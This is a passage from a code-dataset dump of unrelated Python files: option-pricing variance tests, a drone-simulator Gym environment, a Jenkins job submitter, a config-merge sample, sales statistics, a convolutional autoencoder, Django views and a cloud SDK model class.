[exp(-norm(theta)**2)*BS.callSquaredDeriv(K, theta) for theta in theta]\n plt.plot(theta, var, label='variance')\n plt.plot(theta, deriv, label='derivative')\n plt.xlabel(r'$\\theta$')\n plt.legend()\n\ndef plotISCall():\n x = np.linspace(-10, 10)\n y = 1/sqrt(2*pi*T)*exp(-x**2/(2*T))*(s0*exp(-0.5*sigma**2*T + sigma*sqrt(T)*x)-K*exp(-r*T))\n plt.plot(x, y)\n\ndef testExactVar():\n for K in np.linspace(0.6, 1.4, 5):\n for theta in np.linspace(0.0, 1.6, 5):\n print(K, theta)\n numIntC = integrate.quad(lambda x: BS.callISVar(K*s0, theta, x), -np.infty, np.infty)[0]\n numIntP = integrate.quad(lambda x: BS.putISVar(K*s0, theta, x), -np.infty, np.infty)[0]\n exactC = BS.callSquared(K*s0, theta)\n exactP = BS.putSquared(K*s0, theta)\n print(numIntC, exactC, np.abs(numIntC - exactC) / exactC)\n print(numIntP, exactP, np.abs(numIntP - exactP) / exactP)\n\ndef testCallSquaredDeriv():\n for K in np.linspace(0.6, 1.4, 5):\n for theta in np.linspace(0.0, 1.6, 5):\n print(K, theta)\n numIntC = integrate.quad(lambda x: BS.RM(K, theta, x), -np.infty, np.infty)[0]\n epsilon = 1e-10\n numDerivC = (BS.callSquared(K, theta+epsilon)-BS.callSquared(K, theta-epsilon))/2/epsilon\n exactC = BS.callSquaredDeriv(K, theta)\n print(numIntC, numDerivC, exactC, np.abs(numIntC - exactC) / exactC)\n\ndef testVarEquiv():\n for K in np.linspace(0.6, 1.4, 5):\n for theta in np.linspace(0.0, 1.6, 5):\n numIntC = integrate.quad(lambda x: BS.callISVar(K, 0, x), -np.infty, np.infty)[0]\n print(K, theta, BS.callSquared(K, theta), numIntC, exp(2*theta)*BS.callSquared(K/exp(theta), 0))\n\n\n\ndef main():\n fl = open('adaptiv_call.dat', 'w')\n fl.write('Knorm, exact, mu, thopt, thend, thM, exactvar, varest, vratio\\n')\n for K in [0.4, 0.7, 1.0, 1.2, 1.4]:\n thetaM, thetaend, mu, varest = adaptiv(rhoCall, lambda x: FCall(x, K*s0))\n exakt = BS.exactCallPrice(K*s0)\n exvar = BS.callSquared(K*s0)-exakt**2\n thopt = optimize.brentq(lambda th: BS.callSquaredDeriv(K*s0, th), -5, 5)\n fl.write(str(K) + ', ' + str(exakt) + ', ' + str(mu) + ', ' + str(thopt) + ', ' + str(thetaend) + ', ' + str(thetaM) + ', ' + str(exvar) + ', ' + str(varest) + ', ' + str(exvar/varest) + '\\n')\n\n # crude(FCall)\n # print(BS.callSquared(K)-BS.exactCallPrice(K)**2)\n # print(BS.callSquared(K, theta)-BS.exactCallPrice(K)**2)\n # optth = optimize.brentq(lambda th: BS.callSquaredDeriv(K, th), -5, 5)\n # print('optimal theta = ', optth)\n # testExactVar()\n # testCallSquaredDeriv()\n # testVarEquiv()\n\n # plotCallPutPrices()\n\n # plotCallPutVar()\n # plotISVar()\n # plotOptimalTheta()\n\n # plot3DISVars()\n # plotVarRM()\n # translation()\n # MC()\n # plotISCall()\n\n # plt.show()\n\n # theta = np.linspace(-10000, 10000)\n # # y = [sqrt(integrate.quad(lambda x: RMp(theta, x)**2, log(K), np.infty)[0]) for theta in theta]\n # # y = [sqrt(mp.quad(lambda x: RMp(theta, x)**2, [log(K), mp.inf])) for theta in theta]\n # y = [log(sqrt(mp.quad(lambda x: RMput(theta, x)**2, [-mp.inf, mp.inf]))) for theta in theta]\n # print(y)\n # # y = [sqrt(mp.quad(lambda x: Hexpl(theta, x)**2, [log(K), mp.inf])) for theta in theta]\n # plt.plot(theta, y)\n # plt.show()\n\n # mp.plot(lambda theta: sqrt(mp.quad(lambda x: H(theta, x)**2, [log(K), mp.inf])), [100, 1000000000])\n # mp.plot(lambda theta: sqrt(mp.quad(lambda x: H(theta, x)**2, [log(K), mp.inf])), [100, 1000000000])\n\n # pf = []\n # # for th in [0, 100, 10000, 1000000, 100000000]:\n # x = np.linspace(-5, 5)\n # for th in [0, 1, 2, 10]:\n # pf.append(lambda x: H(th, x))\n # print(pf[-1](0))\n # y = [H(th, x)**2 for x in x]\n # plt.plot(x, y, label=str(th))\n\n # plt.legend()\n # plt.show()\n # mp.plot(pf, [-5,5])\n\n # mp.plot(lambda theta: sqrt(mp.quad(lambda x: Hexpl(theta, x)**2, [log(K), mp.inf])), [100, 1000000000])\n # mp.plot(lambda theta: log(sqrt(mp.quad(lambda x: Hexpl(theta, x)**2, [log(K), mp.inf]))), [100, 1000000000])\n\nif __name__ == '__main__':\n main()\n","sub_path":"normal.py","file_name":"normal.py","file_ext":"py","file_size_in_byte":13890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"21611161","text":"import numpy as np\nimport gym\nfrom gym import spaces\nfrom datetime import datetime\n\nfrom time import sleep\nfrom fcntl import fcntl, F_GETFL, F_SETFL\nfrom os import O_NONBLOCK\nimport Queue\nimport threading\nimport subprocess\n\nclass Simulation():\n \n def __init__(self):\n self.p = None\n \n def start(self, x, y, psi):\n # TODO send initial settings to simulation\n self.p = subprocess.Popen(\"../EvolutionaryLearning/EL\", stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT,\n shell=False, universal_newlines=True, close_fds=True)\n # set the O_NONBLOCK flag of p.stdout file descriptor:\n flags = fcntl(self.p.stdout, F_GETFL) # get current p.stdout flags\n fcntl(self.p.stdout, F_SETFL, flags | O_NONBLOCK)\n \n def end(self):\n if self.p is not None and self.p.poll() is None:\n self.p.stdout.flush()\n self.p.stdin.flush()\n self.p.kill()\n self.p.wait()\n\n def write_action(self, action):\n try:\n self.p.stdin.write(str(action) + \"\\n\")\n self.p.stdin.flush()\n except IOError:\n return\n \n def read_state(self):\n result = None\n errors = 0\n while result is None:\n try:\n result = self.p.stdout.readline().strip()\n #except OSError:\n # the os throws an exception if there is no data\n # print '[No more data]'\n except IOError:\n errors += 1\n # print 'not ready'\n if errors > 4:\n self.end()\n sleep(0.1)\n self.start(2,2,0)\n errors = 0\n \n sleep(0.05)\n \n result = np.array([float(i) for i in result.split()])\n return result\n\nclass DelflyEnv(gym.Env):\n metadata = {\n 'render.modes' : ['human', 'rgb_array'],\n 'video.frames_per_second' : 25\n }\n \n def __init__(self):\n \n self.viewer = None\n \n self.max_angle = 2*0.523809524 # 30 deg\n self.action_low = np.array([-self.max_angle, 0.04])\n self.action_high = np.array([self.max_angle, 5])\n self.action_space = spaces.Box(low=self.action_low, high=self.action_high) # angle offset to track\n \n #action_low = -self.max_angle\n #action_high = self.max_angle\n #self.action_space = spaces.Box(low=action_low, high=action_high, shape=(1,)) # angle offset to track\n \n _low = np.array([0,0,0,0,0,0,0,0,0,0,-3.142857143]) # apple detector location, apple detector size, average disparity\n _high = np.array([16,16,16,16,16,16,16,16,16,16,3.142857143])\n self.observation_space = spaces.Box(low = _low, high = _high)\n\n self.observation = np.array([0,0,0,0,0,0,0,0,0,0,0])\n self.state = None\n\n self._seed()\n self._reset()\n self.done = True\n \n self.sim = Simulation()\n \n self.poles = np.array([])\n \n #return observation, reward, done, info\n \n def _step(self, action):\n if self.done is True:\n self.sim.end()\n # reinitialise simulation with new initial conditions\n self.sim.start(2,2,0)\n self.done = False\n self.poles = self.sim.read_state()\n \n # run sim step\n orig_action = action\n action = np.clip(action, self.action_low, self.action_high)\n\n for a in action:\n self.sim.write_action(a)\n \n # read observations\n self.state = self.sim.read_state()\n \n if self.state.size == 0 or self.state[11] >= 0 or self.state[11] < -10:\n self.done = True\n\n if self.state.size >= 12:\n self.observation = self.state[0:11]\n self.reward = self.state[11] # -distance to goal in dm\n #print self.reward, (abs(orig_action[0]) > self.max_angle), 0.1/(abs(orig_action[1]+0.1))\n self.reward = self.reward - (abs(orig_action[0]) > self.max_angle) - 0.1/(abs(orig_action[1]+0.1)) # penalize large actions\n #print self.reward\n \n return self.observation, self.reward, self.done, {}\n \n def _reset(self):\n return self.observation\n \n def _render(self, mode='human', close=False):\n if close:\n if self.viewer is not None:\n self.viewer.close()\n self.viewer = None\n return\n\n screen_width = 600\n screen_height = 600\n\n world_width = 8\n scale = screen_width/world_width\n \n appleWidth = 0.5*scale\n \n delflyWidth = 0.3*scale\n delflyHeight = 0.3*scale\n \n polewidth = 5.0\n polelen = 30.0\n\n if self.viewer is None:\n from gym.envs.classic_control import rendering\n self.viewer = rendering.Viewer(screen_width, screen_height)\n \n # add Delfly\n l,r,t,b = -delflyWidth/2, delflyWidth/2, delflyHeight/2, -delflyHeight/2\n delfly = rendering.FilledPolygon([(l,b), (0,t), (0,t), (r,b)]) # triangle\n self.delflyTrans = rendering.Transform()\n delfly.add_attr(self.delflyTrans)\n self.viewer.add_geom(delfly)\n \n lof = rendering.Line(start=(0.0, 0.0), end=(5*delflyWidth*0.5, 5*delflyWidth*0.866)) # line of sight\n lof.add_attr(self.delflyTrans)\n self.viewer.add_geom(lof)\n \n lof = rendering.Line(start=(0.0, 0.0), end=(-5*delflyWidth*0.5, 5*delflyWidth*0.866)) # line of sight\n lof.add_attr(self.delflyTrans)\n self.viewer.add_geom(lof)\n \n l,r,t,b = -polewidth/2,polewidth/2,polelen-polewidth/2,-polewidth/2\n set_point = rendering.FilledPolygon([(l,b), (l,t), (r,t), (r,b)])\n set_point.set_color(.8,.6,.4)\n self.set_pointtrans = rendering.Transform(translation=(0, 0))\n set_point.add_attr(self.set_pointtrans)\n self.viewer.add_geom(set_point)\n \n self.poleTrans = []\n\n if self.state is None: return None\n \n if self.poles.size > 0:\n if len(self.poleTrans) is not self.poles.size / 2:\n self.poleTrans = []\n for i in range(0,self.poles.size/2):\n pole = rendering.make_circle(appleWidth/2)\n pole.set_color(.5,.5,.8)\n self.poleTrans.append(rendering.Transform(translation=(0,0)))\n pole.add_attr(self.poleTrans[i])\n self.viewer.add_geom(pole)\n # add poles\n for i in range(0,self.poles.size/2):\n self.poleTrans[i].set_translation(self.poles[i*2]*scale, self.poles[i*2 + 1]*scale)\n self.poles = np.array([])\n return None\n\n if self.state.size < 14: return None\n\n x = self.state\n self.delflyTrans.set_translation(x[12]*scale, x[13]*scale)\n self.delflyTrans.set_rotation(x[10]-1.571428571)\n \n self.set_pointtrans.set_translation(x[12]*scale, x[13]*scale)\n self.set_pointtrans.set_rotation(x[14]-1.571428571)\n\n return self.viewer.render(return_rgb_array = mode=='rgb_array')\n","sub_path":"gym/envs/local/delfly_pole.py","file_name":"delfly_pole.py","file_ext":"py","file_size_in_byte":7437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"496108454","text":"#!/usr/bin/env python\n# Author: Nhat Ngo (2017)\n# Nifty python program to submit job directly to Jenkins\n# \n# PREREQUISITE:\n# pip install tenacity\n# export JENKINS_USERNAME=\n# export JENKINS_TOKEN=\n\nimport os\nimport sys\nimport json\nimport tenacity\nimport argparse\nimport requests\n\nimport pprint\nfrom textwrap import dedent\n\n\ndef cli():\n \"\"\"Parse the CLI arguments\"\"\"\n \n cli_usage = \"\"\" Create tempest compute host check on Nectar Jenkins.\n PREREQUISITE:\n export JENKINS_USERNAME=\n export JENKINS_TOKEN=\n \"\"\"\n cloud_usage = \"\"\" Cloud to run tempest on: production, testing, development.\n Default to production.\"\"\"\n az_usage = \"\"\" Zone to run the the test on. See:\n https://wiki.rc.nectar.org.au/wiki/Tempest#AVAILABILITY_ZONES\n \"\"\"\n hosts_usage = \"\"\" Nova hosts to test. You can add multiple hosts. Eg: -s qh2-rcc10 -s qh2-rcc11\n Host must be in AVAILABILITY_ZONE; if not nova will return a 'No Valid Host' error.\n Leave blank to let scheduler choose a host.\n \"\"\"\n wait_usage = \"\"\" Do not wait for job to start, return the queue url immediately.\"\"\"\n debug_usage = \"\"\" Debug mode.\"\"\"\n\n parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,\n description=cli_usage)\n parser.add_argument(\"AVAILABILITY_ZONE\", type=str, action=\"store\",\n help=dedent(az_usage))\n parser.add_argument(\"--host\", \"-s\", type=str, action=\"append\",\n help=dedent(hosts_usage))\n parser.add_argument(\"--cloud\", \"-c\", type=str, action=\"store\", default=None,\n help=dedent(cloud_usage))\n parser.add_argument(\"--nowait\", action=\"store_true\",\n help=dedent(wait_usage))\n parser.add_argument(\"--debug\", action=\"store_true\",\n help=dedent(debug_usage))\n return parser.parse_args()\n\n\ndef get_auth():\n \"\"\"Return basic HTTP token needed to for requests\"\"\"\n username = os.environ.get('JENKINS_USERNAME')\n token = os.environ.get('JENKINS_TOKEN')\n\n if username is None or token is None:\n err_msg = \"\"\" JENKINS_USERNAME/TOKEN not found. Have you set your environment?\n export JENKINS_USERNAME=\n export JENKINS_TOKEN=\n \"\"\"\n raise EnvironmentError(dedent(err_msg))\n\n if DEBUG:\n sys.stdout.write(\"Login as: %s:%s\\n\" % (username, token))\n sys.stdout.flush()\n return (username, token)\n\n\ndef compute_host_check_build(az, host=None, cloud=None):\n \"\"\"Build jenkins compute host with the describe parameters\"\"\"\n # Request.utils.quote escape the string for URL encoding\n params = [\"AVAILABILITY_ZONE=%s\" % requests.utils.quote(az)]\n if host is not None:\n params.append(\"HOST=%s\" % requests.utils.quote(host))\n if cloud is not None:\n params.append(\"CLOUD=%s\" % requests.utils.quote(cloud))\n \n url = \"%s/buildWithParameters?%s\" % (JURL, \"&\".join(params))\n \n if DEBUG:\n sys.stdout.write(\"POST to: %s\\n\" % url)\n sys.stdout.flush()\n\n # Submit the job and get the responding Jenkins queue URL from the headers\n return requests.post(url, auth=AUTH)\n\n\ndef get_queue_json(build_response):\n \"\"\"Return the queue JSON\"\"\"\n queue_url = \"%sapi/json\" % build_response.headers[\"Location\"]\n queue_response = requests.get(queue_url, auth=AUTH)\n return queue_response.json()\n\ndef compute_host_check_submitted(build_response):\n \"\"\"Print out the confirmation of the submitted jenkins.\"\"\"\n response = get_queue_json(build_response)\n queue_url = \"%sapi/json\" % build_response.headers[\"Location\"]\n \n if DEBUG:\n sys.stdout.write(\"Queue response:=======================\\n\")\n pp.pprint(response)\n sys.stdout.write(\"======================================\\n\")\n sys.stdout.flush()\n\n # Get and format the submitted parameters\n params = response[u\"params\"][response[u\"params\"].find(\"AVAILABILITY\"):]\n params = \" \".join(param.split(\"=\")[1] for param in params.split(\"\\n\"))\n result = \"%s submitted: %s\\n\" % (params, queue_url)\n \n sys.stdout.write(result)\n\n\n@tenacity.retry(wait=tenacity.wait_exponential(multiplier=1, max=15),\n stop=tenacity.stop_after_delay(600))\ndef compute_host_check_wait(build_response):\n \"\"\"\n Wait and return the job URL. Stop after 10 minutes.\n Retry exponential from 1 second up to 15 seconds then 15 seconds afterward.\n \"\"\"\n response = get_queue_json(build_response)\n\n if u\"Queue$LeftItem\" not in response[u\"_class\"]:\n err_msg = \"\"\" Waiting timeout after 600 seconds.\n Jenkins is very busy, please check API later.\n \"\"\"\n raise QueuingException(dedent(err_msg))\n \n if DEBUG:\n sys.stdout.write(\"Success response:=======================\\n\")\n pp.pprint(response)\n sys.stdout.write(\"========================================\\n\")\n sys.stdout.flush()\n\n job_url = response[u\"executable\"][u\"url\"]\n\n # Get and format the submitted parameters\n params = response[u\"params\"][response[u\"params\"].find(\"AVAILABILITY\"):]\n params = \" \".join(param.split(\"=\")[1] for param in params.split(\"\\n\"))\n \n # Result\n result = \"%s started: %s\\n\" % (params, job_url)\n \n sys.stdout.write(result)\n\nif __name__ == \"__main__\":\n \n args = cli()\n\n # Set global variables\n global DEBUG\n DEBUG = args.debug\n if DEBUG:\n global pp\n pp = pprint.PrettyPrinter(indent=2)\n\n global AUTH\n AUTH = get_auth()\n global JURL\n JURL = \"https://jenkins.rc.nectar.org.au/job/tempest-compute-host-check\"\n\n CLOUD = args.cloud\n HOSTS = args.host\n AVAILABILITY_ZONE = args.AVAILABILITY_ZONE\n WAIT = not args.nowait\n\n responses = [compute_host_check_build(AVAILABILITY_ZONE,\n host=HOST,\n cloud=CLOUD)\n for HOST in HOSTS]\n \n for resp in responses:\n if WAIT:\n try:\n compute_host_check_wait(resp)\n except QueuingException as ex:\n sys.stdout.write(\"Queue error: %s\\n\" % ex)\n sys.stdout.flush()\n compute_host_check_submitted(resp)\n else:\n compute_host_check_submitted(resp)","sub_path":"tempest_compute_check.py","file_name":"tempest_compute_check.py","file_ext":"py","file_size_in_byte":6044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"621138787","text":"from hier_config import HConfig\nfrom hier_config.host import Host\nimport yaml\n\noptions = yaml.load(open('./tests/files/test_options_ios.yml'))\nhost = Host('brborder1', 'ios', options)\n\n# Build HConfig object for the Running Config\n\nrunning_config_hier = HConfig(host=host)\nrunning_config_hier.load_from_file('./tests/files/brborder1_shrun.log')\n\n# Build Hierarchical Configuration object for the Compiled Config\n\ncompiled_config_hier = HConfig(host=host)\ncompiled_config_hier.load_from_file('./tests/files/brborder1_add.log')\n\n# Merge additional(compiled) config to running config\n\nfor child in compiled_config_hier.children:\n# print(child)\n if 'no ' in str(child):\n child_str = str(child)\n child_str = child_str.lstrip('no ')\n# print(child_str)\n running_config_hier.del_child_by_text(child_str)\n else:\n running_config_hier.add_deep_copy_del_of(child, merged=True)\n\nfor line in running_config_hier.all_children():\n print(line.cisco_style_text())\n","sub_path":"hier_config_sample.py","file_name":"hier_config_sample.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407788711","text":"''' 1 ВАРИАНТ\nНапишем пять функций, которые рассчитывают для каждог�� покупателя необходимый параметр.\n\nНа вход функции получают словарь из ключей - имена покупателей, и значений — списки с суммами.\nВсе функции возвращают словарь по всем покупателям и соответствуещее значение одного из параметров:\n1. число покупок;\n2. среднюю сумму покупки;\n3. максимальную сумму покупки;\n4. минимальную сумму покупки;\n5. общую сумму всех покупок.\n'''\n\n\n# Функция подсчитывает число покупок\ndef n_sale(name):\n s = dict()\n for k in name:\n s[k] = len(name[k])\n return s\n\n\n# Функция подсчитывает среднюю сумму покупки\ndef middle_sum(name):\n s = dict()\n for i in name:\n summ = 0\n for j in range(len(name[i])):\n summ += name[i][j]\n s[i] = float('{:.2f}'.format(summ/len(name[i])))\n return s\n\n\n# Функция опрелеляет сумму максимальной покупки\ndef max_sale(name):\n s = dict()\n for i in name:\n s[i] = max(name[i])\n return s\n\n\n# Функция опрелеляет сумму минимальной покупки\ndef min_sale(name):\n s = dict()\n for i in name:\n s[i] = min(name[i])\n return s\n\n\n# Функция подсчитывает общую сумму всех покупок\ndef sum_m(name):\n s = dict()\n for i in name:\n summ = 0\n for j in range(len(name[i])):\n summ += name[i][j]\n s[i] = summ\n return s\n\n\nsale = {'Алла': [100, 22, 63, 152, 415, 78, 459, 958, 10, 63],\n 'Борис': [122, 52, 36, 256, 398, 45, 145, 147, 15],\n 'Валентин': [54, 45, 789, 369, 52, 14, 16, 35, 14, 747, 95, 8],\n 'Галина': [56, 25, 96, 357, 496, 1258, 12, 45, 65, 36, 45],\n 'Дмитрий': [145, 85, 85, 96, 45, 75, 36, 45, 75, 45, 85, 58],\n 'Дианна': [152, 875, 5, 0.96, 455, 15, 6, 75, 7, 96, 54, 123]}\n\n# Выводим результат в виде таблицы\nprint('Имя Количество Стоимость покупки')\nprint('покупателя', ' покупок', ' Средняя ', ' Максимальная', 'Минимальная ', 'Общая')\nprint('{:_^72}'.format(' 1 ВАРИАНТ с пятью функциями'))\nfor i in sale:\n print('{:<11}'.format(i), '{:<12}'.format(n_sale(sale)[i]), '{:<12}'.format(middle_sum(sale)[i]),\n '{:<12}'.format(max_sale(sale)[i]), '{:<12}'.format(min_sale(sale)[i]), '{:<12}'.format(sum_m(sale)[i]))\n\n\n''' 2 ВАРИАНТ\nНапишим одну функцию - sale_info(name), рассчитывающую для каждого покупателя следующие параметры:\n1. число покупок;\n2. среднюю сумму покупки;\n3. максимальную сумму покупки;\n4. минимальную сумму покупки;\n5. общую сумму всех покупок.\n\nНа вход функция получает словарь из ключей - имена покупателей, и значений — списки с суммами.\nФункция возвращает словарь в виде имен покупателей и списка значений по всем соответствующем параметрам\n'''\n\n\ndef sale_info(name):\n s = dict()\n for i in name:\n summ = 0\n for j in range(len(name[i])):\n summ += name[i][j]\n s[i] = [len(name[i]), float('{:.2f}'.format(summ/len(name[i]))), max(name[i]), min(name[i]), summ]\n return s\n\n\nprint('{:_^72}'.format(' 2 ВАРИАНТ с одной функцией'))\nfor i in sale:\n print('{:<11}'.format(i), end=' ')\n for j in range(len(sale_info(sale)[i])):\n print('{:<12}'.format(sale_info(sale)[i][j]), end=' ')\n print()","sub_path":"DZ_0507_sale.py","file_name":"DZ_0507_sale.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"244728223","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom torch.nn.parameter import Parameter\nimport torch.nn.init as init\nimport torch.nn.functional as F\nfrom torchvision.utils import make_grid\nimport matplotlib.ticker as ticker\n\n# download data\nbatch_size = 128\nimage_size = 64\n\ndataset = dset.CIFAR10(root='../../data/', download=True, train=True,\n transform=transforms.Compose([transforms.Resize(image_size),\n transforms.ToTensor()]))\n# check device is cuda\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n# show image\ndef show(img):\n npimg = img.numpy()\n ax = plt.gca()\n ax.grid(False)\n plt.imshow(np.transpose(npimg, (1,2,0)), interpolation='nearest')\n plt.axis('off')\n\n# define model\nclass ConvAutoEncoder(nn.Module):\n \n def __init__(self):\n \n super(ConvAutoEncoder, self).__init__()\n self.encoder = nn.Sequential(\n nn.Conv2d(3, 512, 4, 2, 0, bias=False), \n nn.BatchNorm2d(512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Conv2d(512, 128, 4, 2, 1, bias=False),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Conv2d(128, 32, 4, 2, 1, bias=False),\n nn.BatchNorm2d(32),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Conv2d(32, 8, 4, 2, 1, bias=False),\n nn.Sigmoid()\n )\n \n self.decoder = nn.Sequential(\n nn.ConvTranspose2d(8, 32, 4, 2, 0, bias=False), \n nn.BatchNorm2d(32),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(32, 128, 4, 2, 1, bias=False),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(128, 512, 4, 2, 1, bias=False),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(512, 3, 4, 2, 1, bias=False),\n nn.Sigmoid()\n )\n \n def forward(self, input):\n encoded = self.encoder(input)\n output = self.decoder(encoded)\n return output\n \n# define training method\ndef train(model, optimiser, criterion, epochs):\n losses = []\n for epoch in range(epochs):\n for idx, (data, label) in enumerate(dataloader):\n model.zero_grad()\n x = data.to(device)\n output = model(x)\n loss = criterion(output, x)\n losses.append(loss)\n loss.backward()\n optimiser.step()\n print('Done: [%d/%d][%d/%d] Loss: %.4f ' % (epoch, epochs, idx, len(dataloader), loss.item()))\n return losses\n\n# define autoencoder\ncae = ConvAutoEncoder().to(device)\n\n# define optim and criterion\noptimizer = torch.optim.Adam(cae.parameters(), lr = 0.001, weight_decay=1e-5)\ncriterion = nn.MSELoss()\n\n# train \nlosses = train(cae, optimizer, criterion, 15)\n\n# plot losses\nplt.figure()\nplt.plot(losses)\n \n","sub_path":"conv_ae.py","file_name":"conv_ae.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"96560695","text":"import sys\n\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import user_passes_test\nfrom django.contrib.sites.models import Site\nfrom django.http import Http404\nfrom django.shortcuts import redirect, render\nfrom django.urls import reverse, reverse_lazy\nfrom django.utils.http import url_has_allowed_host_and_scheme\nfrom sfdo_template_helpers.oauth2.salesforce.views import SalesforcePermissionsError\n\nfrom config.settings.base import IP_RESTRICTED_MESSAGE\n\nGENERIC_ERROR_MSG = \"An internal error occurred while processing your request.\"\n\n\ndef custom_permission_denied_view(request, exception):\n message = GENERIC_ERROR_MSG\n if isinstance(exception, SalesforcePermissionsError):\n message = str(exception)\n\n return render(\n request,\n \"index.html\",\n context={\"JS_CONTEXT\": {\"error_message\": message}},\n status=403,\n )\n\n\ndef custom_500_view(request):\n message = GENERIC_ERROR_MSG\n value = sys.exc_info()[1]\n\n if \"ip restricted\" in value.args[0]:\n message = IP_RESTRICTED_MESSAGE\n\n return render(\n request,\n \"index.html\",\n context={\"JS_CONTEXT\": {\"error_message\": message}},\n status=500,\n )\n\n\n@user_passes_test(lambda user: user.is_superuser, login_url=reverse_lazy(\"admin:login\"))\ndef set_site(request):\n \"\"\"\n Put the selected `site_id` into the session. The ID is then used in favor of the\n current request's domain in `CurrentSiteMiddleware`.\n \"\"\"\n next_url = request.GET.get(\"next\", \"\")\n try:\n site = Site.objects.get(pk=request.GET.get(\"site_id\"))\n except (Site.DoesNotExist, ValueError):\n raise Http404(\"Couldn't find a matching site\")\n request.session[\"site_id\"] = site.id\n\n # Ensure the URL is safe\n if not url_has_allowed_host_and_scheme(next_url, settings.ALLOWED_HOSTS):\n next_url = reverse(\"admin:index\")\n\n # Don't redirect to a change view for an object that won't exist on the selected\n # site - go to its list view instead\n if next_url.endswith(\"/change/\"):\n # Remove the ID, \"/change/\" suffix, and trailing slash\n parts = next_url.split(\"/\")[:-3]\n next_url = \"/\".join(parts) + \"/\"\n\n return redirect(next_url)\n","sub_path":"metadeploy/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"351146566","text":"# coding: utf-8\n\nimport six\n\nfrom huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization\n\n\nclass ScaleScript:\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n sensitive_list = []\n\n openapi_types = {\n 'name': 'str',\n 'uri': 'str',\n 'parameters': 'str',\n 'nodes': 'list[str]',\n 'active_master': 'bool',\n 'fail_action': 'str',\n 'action_stage': 'str'\n }\n\n attribute_map = {\n 'name': 'name',\n 'uri': 'uri',\n 'parameters': 'parameters',\n 'nodes': 'nodes',\n 'active_master': 'active_master',\n 'fail_action': 'fail_action',\n 'action_stage': 'action_stage'\n }\n\n def __init__(self, name=None, uri=None, parameters=None, nodes=None, active_master=None, fail_action=None, action_stage=None):\n \"\"\"ScaleScript\n\n The model defined in huaweicloud sdk\n\n :param name: 弹性伸缩自定义自动化脚本的名称,同一个集群的自定义自动化脚本名称不允许相同。 只能由数字、英文字符、空格、中划线和下划线组成,且不能以空格开头。 可输入的字符串长度为1~64个字符。\n :type name: str\n :param uri: 自定义自动化脚本的路径。设置为OBS桶的路径或虚拟机本地的路径。 - OBS桶的路径:直接手动输入脚本路径。示例:obs://XXX/scale.sh - 虚拟机本地的路径:用户需要输入正确的脚本路径。脚本所在的路径必须以‘/’开头,以.sh结尾。\n :type uri: str\n :param parameters: 自定义自动化脚本参数。 多个参数间用空格隔开。 可以传入以下系统预定义参数: - ${mrs_scale_node_num}:扩缩容节点数 - ${mrs_scale_type}:扩缩容类型,扩容为scale_out,缩容为scale_in - ${mrs_scale_node_hostnames}:扩缩容的节点主机名称 - ${mrs_scale_node_ips}:扩缩容的节点IP - ${mrs_scale_rule_name}:触发扩缩容的规则名 其他用户自定义参数使用方式与普通shell脚本相同,多个参数中间用空格隔开。\n :type parameters: str\n :param nodes: 自定义自动化脚本所执行的节点组名称。\n :type nodes: list[str]\n :param active_master: 自定义自动化脚本是否只运行在主Master节点上。 缺省值为false,表示自定义自动化脚本可运行在所有Master节点上。\n :type active_master: bool\n :param fail_action: 自自定义自动化脚本执行失败后,是否继续执行后续脚本和创建集群。 说明: - 建议您在调试阶段设置为“continue”,无论此自定义自动化脚本是否执行成功,则集群都能继续安装和启动。 - 由于缩容成功无法回滚,因此缩容后执行的脚本“fail_action”必须设置为“continue”。 枚举值: - continue:继续执行后续脚本。 - errorout:终止操作。\n :type fail_action: str\n :param action_stage: 脚本执行时机。 枚举值: - before_scale_out:扩容前 - before_scale_in:缩容前 - after_scale_out:扩容后 - after_scale_in:缩容后\n :type action_stage: str\n \"\"\"\n \n \n\n self._name = None\n self._uri = None\n self._parameters = None\n self._nodes = None\n self._active_master = None\n self._fail_action = None\n self._action_stage = None\n self.discriminator = None\n\n self.name = name\n self.uri = uri\n if parameters is not None:\n self.parameters = parameters\n self.nodes = nodes\n if active_master is not None:\n self.active_master = active_master\n self.fail_action = fail_action\n self.action_stage = action_stage\n\n @property\n def name(self):\n \"\"\"Gets the name of this ScaleScript.\n\n 弹性伸缩自定义自动化脚本的名称,同一个集群的自定义自动化脚本名称不允许相同。 只能由数字、英文字符、空格、中划线和下划线组成,且不能以空格开头。 可输入的字符串长度为1~64个字符。\n\n :return: The name of this ScaleScript.\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this ScaleScript.\n\n 弹性伸缩自定义自动化脚本的名称,同一个集群的自定义自动化脚本名称不允许相同。 只能由数字、英文字符、空格、中划线和下划线组成,且不能以空格开头。 